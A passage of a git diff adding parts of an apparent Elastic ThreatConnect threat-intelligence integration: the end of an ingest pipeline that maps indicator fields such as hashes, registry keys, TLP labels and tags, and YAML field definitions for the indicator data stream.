threat.indicator.reference + tag: append_threat_indicator_reference_from_indicator_legacy_link + value: '{{{threat_connect.indicator.legacy_link}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.legacy_link != null + - rename: + field: json.md5 + tag: rename_md5 + target_field: threat_connect.indicator.md5 + ignore_missing: true + - set: + field: threat.indicator.file.hash.md5 + tag: set_threat_indicator_file_hash_md5_from_indicator_md5 + copy_from: threat_connect.indicator.md5 + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('File') + - rename: + field: json.Key Name + tag: rename_Key Name + target_field: threat_connect.indicator.key_name + ignore_missing: true + - set: + field: threat.indicator.registry.path + tag: set_threat_indicator_registry_path_from_indicator_key_name + copy_from: threat_connect.indicator.key_name + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('Registry Key') + - append: + field: related.hash + tag: convert_md5_address_to_related_hash + value: '{{{threat_connect.indicator.md5}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.md5 != null + - rename: + field: json.Mutex + tag: rename_Mutex + target_field: threat_connect.indicator.mutex + ignore_missing: true + - rename: + field: json.observations + tag: rename_observations + target_field: threat_connect.indicator.observations + ignore_missing: true + - convert: + field: json.ownerId + tag: convert_ownerId_to_string + target_field: threat_connect.indicator.owner.id + type: string + ignore_missing: true + - rename: + field: json.ownerName + tag: rename_ownerName + target_field: threat_connect.indicator.owner.name + ignore_missing: true + - convert: + field: json.privateFlag + tag: convert_privateFlag_to_boolean + target_field: threat_connect.indicator.private_flag + type: boolean + 
ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.rating + tag: convert_rating_to_double + target_field: threat_connect.indicator.rating + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.securityLabels.data + if: ctx.json?.securityLabels?.data != null + tag: foreach_date_securityLabels_data_dateAdded + processor: + date: + field: _ingest._value.dateAdded + tag: date_securityLabels_data_dateAdded + target_field: _ingest._value.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dateAdded + ignore_missing: true + - script: + lang: painless + description: "Extract TLP and providers from source" + if: ctx.json?.securityLabels?.data != null && ctx.json?.securityLabels?.data instanceof List + tag: script_securityLabels_data_name + source: >- + def ecsTlps = ['WHITE','CLEAR','GREEN','AMBER','AMBER+STRICT','RED']; + def tlps = new ArrayList(); + for (def obj : ctx.json.securityLabels.data) { + if (obj.containsKey('name')) { + if (obj.get('name').contains(':')){ + def name = obj.get('name').splitOnToken(':')[1]; + if (ecsTlps.contains(name)) { + tlps.add(name) + } + } + } + } + if (tlps.size() > 0){ + if (ctx.threat.indicator.marking == null) { + ctx.threat.indicator.marking = new HashMap(); + } + ctx.threat.indicator.marking.tlp = tlps; + } + - foreach: + field: json.securityLabels.data + if: ctx.json?.securityLabels?.data != null + tag: foreach_convert_securityLables_data_id_to_string + processor: + convert: + field: 
_ingest._value.id + tag: convert_securityLables_data_id_to_string + target_field: _ingest._value.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.securityLabels.data + tag: rename_securityLabels_data + target_field: threat_connect.indicator.security_labels.data + ignore_missing: true + - foreach: + field: threat_connect.indicator.security_labels.data + if: ctx.threat_connect?.indicator?.security_labels?.data instanceof List + tag: foreach_remove_security_labels_duplicates + processor: + remove: + field: + - _ingest._value.dateAdded + tag: remove_security_labels_duplicate_fields + ignore_missing: true + - rename: + field: json.sha1 + tag: rename_sha1 + target_field: threat_connect.indicator.sha1 + ignore_missing: true + - set: + field: threat.indicator.file.hash.sha1 + tag: set_threat_indicator_file_hash_sha1_from_indicator_sha1 + copy_from: threat_connect.indicator.sha1 + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('File') + - append: + field: related.hash + tag: convert_sha1_address_to_related_hash + value: '{{{threat_connect.indicator.sha1}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.sha1 != null + - rename: + field: json.sha256 + tag: rename_sha256 + target_field: threat_connect.indicator.sha256 + ignore_missing: true + - set: + field: threat.indicator.file.hash.sha256 + tag: set_threat_indicator_file_hash_sha256_from_indicator_sha256 + copy_from: threat_connect.indicator.sha256 + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('File') + 
- append: + field: related.hash + tag: convert_sha256_address_to_related_hash + value: '{{{threat_connect.indicator.sha256}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.md5 != null + - convert: + field: json.size + tag: convert_size_to_string + target_field: threat_connect.indicator.size + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.source + tag: rename_source + target_field: threat_connect.indicator.source + ignore_missing: true + - rename: + field: json.Subject + tag: rename_Subject + target_field: threat_connect.indicator.subject + ignore_missing: true + - set: + field: email.subject + tag: set_email_subject_from_indicator_subject + copy_from: threat_connect.indicator.subject + ignore_empty_value: true + - rename: + field: json.summary + tag: rename_summary + target_field: threat_connect.indicator.summary + ignore_missing: true + - set: + field: event.id + tag: set_event_id_from_indicator_summary + copy_from: threat_connect.indicator.summary + ignore_empty_value: true + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_convert_tags_data_id_to_string + processor: + convert: + field: _ingest._value.id + tag: convert_tags_data_id_to_string + target_field: _ingest._value.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_date_tags_data_lastUsed + 
processor: + date: + field: _ingest._value.lastUsed + tag: date_tags_data_lastUsed + target_field: _ingest._value.last_used + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastUsed + ignore_missing: true + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_convert_tags_data_platforms_count_to_long + processor: + convert: + field: _ingest._value.platforms.count + tag: convert_tags_data_platforms_count_to_long + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.platforms.count + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_rename_tags_data_techniqueId + processor: + rename: + field: _ingest._value.techniqueId + tag: rename_tags_data_techniqueId + target_field: _ingest._value.technique.id + ignore_missing: true + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_append_tags_data_techniqueId + processor: + append: + field: threat.technique.id + tag: append_tags_data_techniqueId + value: '{{{_ingest._value.technique.id}}}' + allow_duplicates: false + - foreach: + field: json.tags.data + if: ctx.json?.tags?.data != null + tag: foreach_tags_data_append_os_family + processor: + foreach: + field: _ingest._value.platforms.data + ignore_missing: true + tag: foreach_platforms_data + processor: + append: + field: os.family + tag: append_tags_platforms_data + value: '{{{_ingest._value}}}' + allow_duplicates: false + - rename: + field: json.tags.data + tag: rename_tags_data + target_field: threat_connect.indicator.tags.data + ignore_missing: true + - foreach: + field: threat_connect.indicator.tags.data + if: ctx.threat_connect?.indicator?.tags?.data != 
null + tag: foreach_remove_tags_duplicate_fields + processor: + remove: + field: + - _ingest._value.lastUsed + tag: remove_tags_duplicate_fields + ignore_missing: true + - rename: + field: json.text + tag: rename_text + target_field: threat_connect.indicator.text + ignore_missing: true + - set: + field: threat.indicator.url.original + tag: set_threat_indicator_url_original_from_indicator_text + copy_from: threat_connect.indicator.text + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('URL') + - convert: + field: json.threatAssessConfidence + tag: convert_threatAssessConfidence_to_double + target_field: threat_connect.indicator.threat_assess.confidence + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessRating + tag: convert_threatAssessRating_to_double + target_field: threat_connect.indicator.threat_assess.rating + type: double + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessScoreFalsePositive + tag: convert_threatAssessScoreFalsePositive_to_long + target_field: threat_connect.indicator.threat_assess.score.false_positive + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: 
json.threatAssessScoreObserved + tag: convert_threatAssessScoreObserved_to_long + target_field: threat_connect.indicator.threat_assess.score.observed + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threatAssessScore + tag: convert_threatAssessScore_to_long + target_field: threat_connect.indicator.threat_assess.score.value + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.trackedUsers + tag: rename_trackedUsers + target_field: threat_connect.indicator.tracked_users + ignore_missing: true + - rename: + field: json.User Agent String + tag: rename_User Agent String + target_field: threat_connect.indicator.user_agent_string + ignore_missing: true + - set: + field: user_agent.original + tag: set_user_agent_original_from_indicator_user_agent_string + copy_from: threat_connect.indicator.user_agent_string + ignore_empty_value: true + - rename: + field: json.Value Name + tag: rename_Value Name + target_field: threat_connect.indicator.value.name + ignore_missing: true + - set: + field: threat.indicator.registry.value + tag: set_threat_indicator_registry_value_from_indicator_value_name + copy_from: threat_connect.indicator.value.name + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('Registry Key') + - rename: + field: json.Value Type + tag: rename_Value Type + target_field: threat_connect.indicator.value.type + ignore_missing: true + - set: + field: 
threat.indicator.registry.data.type + tag: set_threat_indicator_registry_data_type_from_indicator_value_type + copy_from: threat_connect.indicator.value.type + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('Registry Key') + - rename: + field: json.webLink + tag: rename_webLink + target_field: threat_connect.indicator.web_link + ignore_missing: true + - append: + field: threat.indicator.reference + tag: append_threat_indicator_reference_from_indicator_web_link + value: '{{{threat_connect.indicator.web_link}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.web_link != null + - rename: + field: json.whoIs + tag: rename_whoIs + target_field: threat_connect.indicator.who_is + ignore_missing: true + - convert: + field: json.whoisActive + tag: convert_whoisActive_to_boolean + target_field: threat_connect.indicator.whois_active + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. 
+ source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_threatconnect/data_stream/indicator/fields/base-fields.yml b/packages/ti_threatconnect/data_stream/indicator/fields/base-fields.yml new file mode 100644 index 00000000000..0ea1baf7e18 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/fields/base-fields.yml @@ -0,0 +1,24 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: ti_threatconnect +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: ti_threatconnect.indicator +- name: '@timestamp' + type: date + description: Event timestamp. +- name: threat.feed.name + type: constant_keyword + description: Display friendly feed name. + value: ThreatConnect Indicator diff --git a/packages/ti_threatconnect/data_stream/indicator/fields/beats.yml b/packages/ti_threatconnect/data_stream/indicator/fields/beats.yml new file mode 100644 index 00000000000..b3701b581cf 
--- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/fields/beats.yml @@ -0,0 +1,9 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/ti_threatconnect/data_stream/indicator/fields/fields.yml b/packages/ti_threatconnect/data_stream/indicator/fields/fields.yml new file mode 100644 index 00000000000..57710389d51 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/fields/fields.yml 
@@ -0,0 +1,655 @@ +- name: threat_connect + type: group + fields: + - name: indicator + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: associated_artifacts + type: flattened + description: A list of Artifacts associated to the Indicator. + - name: associated_cases + type: flattened + description: A list of Cases associated to the Indicator. + - name: associated_groups + type: group + fields: + - name: data + type: group + fields: + - name: assignments + type: group + fields: + - name: data + type: group + fields: + - name: type + type: keyword + description: Valid values for the type of assignment are Assigned and Escalate. + - name: user + type: group + fields: + - name: id + type: keyword + description: Unique identifier of users assigned to the Task or to whom the Task will be escalated. + - name: body + type: keyword + description: The Emails body. + - name: created_by + type: group + fields: + - name: first_name + type: keyword + description: First name of user. + - name: id + type: keyword + description: Unique Identifier of the user who created the group. + - name: last_name + type: keyword + description: Last name of user. + - name: owner + type: keyword + description: Owner of attribute creator. + - name: pseudonym + type: keyword + description: Pseudonym or alias of the user. + - name: user_name + type: keyword + description: Username of user. + - name: date_added + type: date + description: Date and time group was added. 
+ - name: document + type: group + fields: + - name: date_added + type: date + description: Date and time when the document was added. + - name: type + type: keyword + description: The type of document. + - name: down_vote_count + type: keyword + description: Downvote Intel Rating. + - name: due_date + type: date + description: The date and time when the Task is due. + - name: email_date + type: date + description: The date associated with an email. + - name: escalation_date + type: date + description: The date and time when the Task should be escalated. + - name: event_date + type: date + description: The date and time when the Event took place. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Group was created externally. + - name: expires + type: date + description: The date and time when the Group expires externally. + - name: last_modified + type: date + description: The date and time when the Group was last modified externally. + - name: file + type: group + fields: + - name: name + type: keyword + description: The file name of the Document. + - name: size + type: keyword + description: The File size of the document. + - name: text + type: keyword + description: The file text of the Signature. + - name: type + type: keyword + description: The file type of the SignaturePossible values are Bro, ClamAV, CybOX, Iris Search Hash, KQL, OpenIOC, Regex, SPL, Sigma, Snort, Suricata, TQL Query and YARA. + - name: first_seen + type: date + description: The date and time when the Group was first seen. + - name: from + type: keyword + description: The Emails subject. + - name: generated_report + type: boolean + description: Indicates whether the report is generated. + - name: header + type: keyword + description: The Emails header. + - name: id + type: keyword + description: Unique Identifier of Group. 
+ - name: last_modified + type: date + description: Date and time when the document was last updated. + - name: last_seen + type: date + description: The date and time when the Group was last seen. + - name: legacy_link + type: keyword + description: Legacy link to the group's details in the ThreatConnect web application. + - name: malware + type: boolean + description: Indicates whether the Document is malware. + - name: name + type: keyword + description: The Groups name. + - name: owner + type: group + fields: + - name: id + type: keyword + description: The ID of the owner to which the Group belongs. + - name: name + type: keyword + description: The name of the owner to which the Group belongs. + - name: password + type: keyword + description: The password associated with the Document. + - name: publish_date + type: date + description: The date and time when the Report was published. + - name: reminder_date + type: date + description: The date and time when a reminder about the Task will be sent. + - name: score_breakdown + type: keyword + description: A breakdown or explanation of the score, providing additional information about how the score was determined. + - name: score_includes_body + type: boolean + description: Indicates whether the score includes information from the email body. + - name: status + type: keyword + description: The status of the Group type. + - name: subject + type: keyword + description: The Emails From field. + - name: to + type: keyword + description: The receiver email address. + - name: type + type: keyword + description: The type of Group being created. Possiblevalues :Adversary, AttackPattern, Campaign, CourseofAction, Document, Email, Event, Incident, IntrusionSet, Malware, Report, Signature, Tactic, Task, Threat, Tool and Vulnerability. + - name: up_vote + type: boolean + description: Use this field to update the Groups Intel Rating. + - name: up_vote_count + type: keyword + description: Upvote Intel Rating. 
+ - name: web_link + type: keyword + description: Link to the group's details in the ThreatConnect web application. + - name: xid + type: keyword + description: The Groups XID. + - name: associated_indicators + type: group + fields: + - name: data + type: group + fields: + - name: active + type: group + fields: + - name: locked + type: boolean + description: Indicates whether the active status is locked. + - name: value + type: boolean + description: Indicates whether the indicator is active. + - name: address + type: keyword + description: The email address associated with the Email Address Indicator. + - name: as_number + type: keyword + description: The AS number associated with the ASN Indicator. + - name: block + type: keyword + description: The block of network IP addresses associated with the CIDR Indicator. + - name: confidence + type: long + description: The Indicators Confidence Rating. + - name: date_added + type: date + description: Date and time when the indicator was added. + - name: description + type: keyword + description: Description of the indicator. + - name: dns_active + type: boolean + description: Indicates whether the DNS feature is active for the Host Indicator. + - name: external + type: group + fields: + - name: date + type: group + fields: + - name: added + type: date + description: The date and time when the Indicator was created externally. + - name: expires + type: date + description: The date and time when the Indicator expires externally. + - name: last_modified + type: date + description: The date and time when the Indicator was last modified externally. + - name: first_seen + type: date + description: The date and time when the Indicator was first seen. + - name: hashtag + type: keyword + description: The hashtag term associated with the Hashtag Indicator. + - name: host_name + type: keyword + description: The host name associated with the Host Indicator. 
+ - name: id
+ type: keyword
+ description: Unique identifier for the indicator.
+ - name: ip
+ type: ip
+ description: The IP address associated with the Address Indicator.
+ - name: key_name
+ type: keyword
+ description: The name of the registry key associated with the Registry Key Indicator.
+ - name: last_modified
+ type: date
+ description: Date and time when the indicator was last modified.
+ - name: last_seen
+ type: date
+ description: The date and time when the Indicator was last seen.
+ - name: legacy_link
+ type: keyword
+ description: Legacy link to the indicator's details in the ThreatConnect web application.
+ - name: md5
+ type: keyword
+ description: MD5 hash value associated with the indicator.
+ - name: mutex
+ type: keyword
+ description: The synchronization primitive used to identify malware files that is associated with the Mutex.
+ - name: owner
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: Identifier for the owner of the indicator.
+ - name: name
+ type: keyword
+ description: Name of the organization that owns the indicator.
+ - name: private_flag
+ type: boolean
+ description: Indicates whether the indicator is marked as private.
+ - name: rating
+ type: double
+ description: The Indicators Threat Rating.
+ - name: sha1
+ type: keyword
+ description: The SHA1 hash associated with the File Indicator.
+ - name: sha256
+ type: keyword
+ description: The SHA256 hash associated with the File Indicator.
+ - name: size
+ type: keyword
+ description: The size of the file associated with the File Indicator.
+ - name: subject
+ type: keyword
+ description: The subject line of the email associated with the Email Subject Indicator.
+ - name: summary
+ type: keyword
+ description: Summary or description of the indicator.
+ - name: text
+ type: keyword
+ description: The URL associated with the URL Indicator.
+ - name: type
+ type: keyword
+ description: Type of the indicator.
+ - name: user_agent_string
+ type: keyword
+ description: The characteristic identification string associated with the User Agent Indicator.
+ - name: value
+ type: group
+ fields:
+ - name: name
+ type: keyword
+ description: The registry value associated with the Registry Key Indicator.
+ - name: type
+ type: keyword
+ description: "Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ."
+ - name: web_link
+ type: keyword
+ description: Link to the indicator's details in the ThreatConnect web application.
+ - name: whois_active
+ type: boolean
+ description: Indicates whether the Whois feature is active for the Host Indicator.
+ - name: attributes
+ type: group
+ fields:
+ - name: data
+ type: group
+ fields:
+ - name: created_by
+ type: group
+ fields:
+ - name: first_name
+ type: keyword
+ description: First name of the user who created the victim attribute.
+ - name: id
+ type: keyword
+ description: Unique Identifier of the user who created the attribute.
+ - name: last_name
+ type: keyword
+ description: Lastname of the user who created the victim attribute.
+ - name: owner
+ type: keyword
+ description: Owner of attribute creator.
+ - name: pseudonym
+ type: keyword
+ description: Pseudonym or alias of the user.
+ - name: user_name
+ type: keyword
+ description: Username of the user who created the victim attribute.
+ - name: date_added
+ type: date
+ description: Date and time when the attribute was added.
+ - name: default
+ type: boolean
+ description: Indicates whether the Attribute is the default Attribute of its type for the Indicator to which it is added (this field applies to certain Attribute and data types only).
+ - name: id
+ type: keyword
+ description: Unique Identifier of attribute.
+ - name: last_modified
+ type: date
+ description: Date and time when attribute was modified.
+ - name: pinned
+ type: boolean
+ description: Indicates whether the Attribute is to be displayed as a Pinned Attribute on the Details screen for the Indicator to which the Attribute is added.
+ - name: source
+ type: keyword
+ description: The Attributes source.
+ - name: type
+ type: keyword
+ description: The Attributes type.
+ - name: value
+ type: keyword
+ description: The Attributes value.
+ - name: block
+ type: keyword
+ description: The block of network IP addresses associated with the CIDR Indicator.
+ - name: confidence
+ type: long
+ description: The Indicators Confidence Rating.
+ - name: custom_associations
+ type: flattened
+ description: Includes indicators with custom associations to the indicator.
+ - name: date_added
+ type: date
+ description: Date and time when the indicator was added.
+ - name: deleted_at
+ type: date
+ description: Date when the IOC was expired/deleted.
+ - name: description
+ type: keyword
+ description: Description of the indicator.
+ - name: dns_active
+ type: boolean
+ description: Indicates whether the DNS feature is active for the Host Indicator.
+ - name: dns_resolution
+ type: flattened
+ description: Includes DNS resolution data related to the Host indicators.
+ - name: enrichment
+ type: flattened
+ description: Includes Enrichment data related to the indicator.
+ - name: expiration_duration
+ type: keyword
+ description: Duration when the IOC will expire.
+ - name: external
+ type: group
+ fields:
+ - name: date
+ type: group
+ fields:
+ - name: added
+ type: date
+ description: The date and time when the Indicator was created externally.
+ - name: expires
+ type: date
+ description: The date and time when the Indicator expires externally.
+ - name: external_last
+ type: group
+ fields:
+ - name: modified
+ type: date
+ description: The date and time when the Indicator was last modified externally.
+ - name: false_positive_reported_by_user
+ type: boolean
+ description: Indicates whether false positive is reported by user.
+ - name: false_positives
+ type: long
+ description: Count of false positives.
+ - name: file_actions
+ type: flattened
+ description: A list of File Actions associated with the File Indicator.
+ - name: file_occurrences
+ type: flattened
+ description: A list of File Occurrences associated with the File Indicator.
+ - name: first_seen
+ type: date
+ description: The date and time when the Indicator was first seen.
+ - name: generic_custom_indicator_values
+ type: flattened
+ description: 'Includes the fields over-writing the custom field names: value1, value2, and value3.'
+ - name: geo_location
+ type: flattened
+ description: Includes GEO location information related to the Host and IP indicators.
+ - name: hashtag
+ type: keyword
+ description: The hashtag term associated with the Hashtag Indicator.
+ - name: host_name
+ type: keyword
+ description: The host name associated with the Host Indicator.
+ - name: id
+ type: keyword
+ description: Unique identifier for the indicator.
+ - name: investigation_links
+ type: flattened
+ description: Includes investigation links related to the indicator type.
+ - name: ip
+ type: ip
+ description: The IP address associated with the Address Indicator.
+ - name: key_name
+ type: keyword
+ description: The name of the registry key associated with the Registry Key Indicator.
+ - name: last_false_positive
+ type: date
+ description: Date and time of last false positive.
+ - name: last_modified
+ type: date
+ description: Date and time when the indicator was last modified.
+ - name: last_seen
+ type: date
+ description: The date and time when the Indicator was last seen.
+ - name: legacy_link
+ type: keyword
+ description: Legacy link to the indicator's details in the ThreatConnect web application.
+ - name: md5
+ type: keyword
+ description: MD5 hash value associated with the indicator.
+ - name: mutex
+ type: keyword
+ description: The synchronization primitive used to identify malware files that is associated with the Mutex.
+ - name: observations
+ type: flattened
+ description: Includes the Observations fields.
+ - name: owner
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: Identifier for the owner of the indicator.
+ - name: name
+ type: keyword
+ description: Name of the organization that owns the indicator.
+ - name: private_flag
+ type: boolean
+ description: Indicates whether the indicator is marked as private.
+ - name: rating
+ type: double
+ description: The Indicators Threat Rating.
+ - name: security_labels
+ type: group
+ fields:
+ - name: data
+ type: group
+ fields:
+ - name: color
+ type: keyword
+ description: Color associated with the security label.
+ - name: date_added
+ type: date
+ description: ' The date and time when the security label was added.'
+ - name: description
+ type: keyword
+ description: Description of the security label.
+ - name: id
+ type: keyword
+ description: Unique identifier for the security label.
+ - name: name
+ type: keyword
+ description: Actual name or label of the security classification.
+ - name: owner
+ type: keyword
+ description: The entity or system that owns or manages the security label.
+ - name: source
+ type: keyword
+ description: The source of the security label.
+ - name: sha1
+ type: keyword
+ description: The SHA1 hash associated with the File Indicator.
+ - name: sha256
+ type: keyword
+ description: The SHA256 hash associated with the File Indicator.
+ - name: size
+ type: keyword
+ description: The size of the file associated with the File Indicator.
+ - name: source
+ type: keyword
+ description: The Indicators source.
+ - name: subject
+ type: keyword
+ description: The subject line of the email associated with the Email Subject Indicator.
+ - name: summary
+ type: keyword
+ description: Summary or description of the indicator.
+ - name: tags
+ type: group
+ fields:
+ - name: data
+ type: group
+ fields:
+ - name: description
+ type: keyword
+ description: The Tags description.
+ - name: id
+ type: keyword
+ description: Unique Identifier of tag.
+ - name: last_used
+ type: date
+ description: Date and time when tag was last used.
+ - name: name
+ type: keyword
+ description: Name of tag.
+ - name: owner
+ type: keyword
+ description: The Organization, Community, or Source to which the Tag belongs.
+ - name: platforms
+ type: group
+ fields:
+ - name: count
+ type: long
+ description: Count of platforms.
+ - name: data
+ type: keyword
+ description: Platform on which tag is added.
+ - name: technique
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: Unique Identifier of tag technique.
+ - name: text
+ type: keyword
+ description: The URL associated with the URL Indicator.
+ - name: threat_assess
+ type: group
+ fields:
+ - name: confidence
+ type: double
+ description: The confidence level associated with the threat assessment.
+ - name: rating
+ type: double
+ description: A numerical rating indicating the threat assessment level.
+ - name: score
+ type: group
+ fields:
+ - name: false_positive
+ type: long
+ description: The count of false positives associated with the threat assessment score.
+ - name: observed
+ type: long
+ description: The observed value associated with the threat assessment score.
+ - name: value
+ type: long
+ description: The overall score assigned to the threat, indicating its severity or risk.
+ - name: tracked_users
+ type: flattened
+ description: Includes Observations and False Positive stats of tracked users.
+ - name: type
+ type: keyword
+ description: Type of the indicator (e.g., File, IP address).
+ - name: user_agent_string
+ type: keyword
+ description: The characteristic identification string associated with the User Agent Indicator.
+ - name: value
+ type: group
+ fields:
+ - name: name
+ type: keyword
+ description: The registry value associated with the Registry Key Indicator.
+ - name: type
+ type: keyword
+ description: "Possible values: REG_NONE, REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN, REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK, REG_MULTI_SZ, REG_QWORD, REG_QWORD_LITTLE_ENDIAN and REG_SZ."
+ - name: web_link
+ type: keyword
+ description: Link to the indicator's details in the ThreatConnect web application.
+ - name: who_is
+ type: flattened
+ description: Includes WhoIs information related to the Host indicators.
+ - name: whois_active
+ type: boolean
+ description: Indicates whether the Whois feature is active for the Host Indicator.
+- name: labels.is_ioc_transform_source
+ type: constant_keyword
+ value: 'true'
+ description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators.
diff --git a/packages/ti_threatconnect/data_stream/indicator/lifecycle.yml b/packages/ti_threatconnect/data_stream/indicator/lifecycle.yml
new file mode 100644
index 00000000000..5a4af9095b7
--- /dev/null
+++ b/packages/ti_threatconnect/data_stream/indicator/lifecycle.yml
@@ -0,0 +1 @@
+data_retention: "5d"
diff --git a/packages/ti_threatconnect/data_stream/indicator/manifest.yml b/packages/ti_threatconnect/data_stream/indicator/manifest.yml
new file mode 100644
index 00000000000..349bab0f8c3
--- /dev/null
